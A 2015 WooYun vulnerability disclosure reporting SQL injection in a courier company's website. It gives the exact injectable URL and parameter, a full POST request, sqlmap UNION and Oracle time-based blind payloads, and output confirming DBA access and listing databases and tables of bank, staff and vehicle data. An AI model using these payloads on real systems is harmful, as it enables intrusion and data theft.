当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141436

漏洞标题:快递行业之速尔快递官网SQL泄漏银行帐号/考勤/考核/车辆/网点等信息

相关厂商:速尔快递

漏洞作者: 洞主

提交时间:2015-09-16 10:45

修复时间:2015-10-31 10:46

公开时间:2015-10-31 10:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

库里的内容还是比较多的,具体有多少还是看漏洞证明吧,懒得打字。

详细说明:

注入点: http://www.sure56.com/bindselect.asp?
参数province 未做过滤,存在SQL注入。

POST /bindselect.asp HTTP/1.1
Origin: http://www.sure56.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.sure56.com/joinonline.asp
Accept: */*
Cookie: ASPSESSIONIDQACRBABR=MMEDOGBAJCLCDMOAOHMGFOFK; billcode=94102
Content-Length: 40
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en,*
Host: www.sure56.com
Pragma: no-cache
Cache-Control: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
action=fillArea&province=姹熻嫃鐪?city=

漏洞证明:

当前用户、DBA权限证明

Parameter: province (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: action=fillArea&province=江苏??city=' UNION ALL SELECT NULL,NULL,CH
R(113)||CHR(118)||CHR(113)||CHR(106)||CHR(113)||CHR(110)||CHR(85)||CHR(103)||CHR
(65)||CHR(104)||CHR(85)||CHR(80)||CHR(115)||CHR(87)||CHR(85)||CHR(113)||CHR(118)
||CHR(106)||CHR(106)||CHR(113) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (comment)
Payload: action=fillArea&province=江苏??city=' AND 8295=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(106)||CHR(110)||CHR(86)||CHR(71),5)--
---
[23:51:09] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[23:51:09] [INFO] fetching current user
current user: 'E3NEW'
[23:51:09] [INFO] testing if current user is DBA
current user is DBA: True


存在的库

available databases [20]:
[*] APPQOSSYS
[*] ATHENA
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] E3DATA
[*] E3NEW
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TRANSFER_USER
[*] WMSYS
[*] XDB


库E3NEW中的表,比较多,摘取一部分,

| TAB_网点班次表                         |
| TAB_网点运单库存余额表 |
| TAB_网点采购表 |
| TAB_网点银行账号表 |
| TAB_网点预付款类型表 |
| TAB_网络表 |
| TAB_罚款表 |
| TAB_罚款表单号 |
| TAB_考勤日期表 |
| TAB_考勤时效表 |
| TAB_考勤机器连接配置表 |
| TAB_考勤记录表 |
| TAB_考核信息表 |
| TAB_职位调动表 |
| TAB_自定义联系人表 |
| TAB_航班信息表 |
| TAB_航空主单表 |
| TAB_营业网点LOG表 |
| TAB_营业网点操作类型表 |
| TAB_营业网点表 |
| TAB_袋运单子单表 |
| TAB_解析错误记录表 |
| TAB_订单来源表 |
| TAB_订单状态对照表 |
| TAB_评价类型维护表 |
| TAB_财付通批量代付表 |
| TAB_货单状态表 |
| TAB_货币币别表 |
| TAB_货款表 |
| TAB_货款表_NEW |
| TAB_货款表_TEMP |
| TAB_费用确认类型表 |
| TAB_费用确认表 |
| TAB_车主司机信息表 |
| TAB_车主司机维护日志表 |
| TAB_车线利润分析统计表 |
| TAB_车线利润成本表 |
| TAB_车线利润成本表_中心 |
| TAB_车线费用明细表 |
| TAB_车辆OP记录表 |
| TAB_车辆信息表 |
| TAB_车辆实际运行监控表 |
| TAB_车辆封签记录表 |
| TAB_车辆班次表 |
| TAB_车辆类型表 |
| TAB_车辆线路时效表 |
| TAB_车辆考勤记录表 |
| TAB_车辆节点车线表 |
| TAB_车辆表 |
| TAB_车辆装载明细表 |
| TAB_车辆费用表 |
| TAB_车辆路由表 |
| TAB_车辆车线中间表 |
| TAB_车辆运行计划表 |
| TAB_车队表 |
| TAB_运单入库品名表 |
| TAB_运单入库品名表_NEW |
| TAB_运单入库品名表_NEWAUDIT |
| TAB_运单库存余额表 |
| TAB_运单库存余额表_NEW |
| TAB_运单状态表 |
| TAB_运单资料表 |
| TAB_运单资料表_刷重量 |
| TAB_运输车辆表 |
| TAB_返回货单表 |
| TAB_退网停网记录 |
| TAB_通用报价修改序号 |
| TAB_通用报价删除记录表 |
| TAB_通用报价整车表 |
| TAB_通用报价更新记录表 |
| TAB_通用报价表 |
| TAB_通用报价表BLOB_BAK |
| TAB_通用报价表CLOB |
| TAB_通用报价表CLOBAUDIT |
| TAB_通用报价表CLOB_BAK20150826 |
| TAB_通用报价表承包区 |
| TAB_通用报价表站点 |
| TAB_通话记录管理 |
| TAB_速付通财务确认表 |
| TAB_速付通费用确认表 |
| TAB_采购表 |
| TAB_采购表_NEW |
| TAB_银行开户地区表 |
| TAB_错分发件表 |
| TAB_问题件原因表 |
| TAB_问题件处理建议表 |
| TAB_问题件处理表 |
| TAB_问题件申报表 |
| TAB_问题件类型 |
| TAB_问题件类型NEW |
| TAB_问题件记录表 |
| TAB_预付款付款方式表 |
| TAB_预付款余额处理日志表 |
| TAB_预付款余额待处理表 |
| TAB_预付款帐套中心表 |
| TAB_预付款类型表 |
| TAB_预付款调度日志表 |
| TAB_预付款转账表 |
| 代收款手续费 |
| 代收款比率 |
| 代收货款手续费对帐比率表 |
| 公司员工表 |
| 删除记录表 |
| 到付款中心对帐比率 |
| 到付款比率 |
| 到付款限制规则 |
| 到付运单资料表 |
| 区域对照管理表 |
| 区域表网点调整反馈表 |
| 巴枪记录表 |
| 巴枪记录表_OPLOG_DEBUG |
| 承包区报价表 |
| 报价权限表 |
| 报价模板表 |
| 报价表 |
| 报关资料表 |
| 本地自动对帐表 |
| 管道自动对帐表 |
| 系统参数表 |
| 菜单表 |
| 费用调整登记表 |
| 车线路由表 |
| 车辆皮重表 |
| 车辆表 |
| 运力表 |
| AA_BIND |
| AA_E3NEW |
| AA_E3WEB |
| AA_GPRS |
| AA_HARD |


修复方案:

我也不知道

版权声明:转载请注明来源 洞主@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论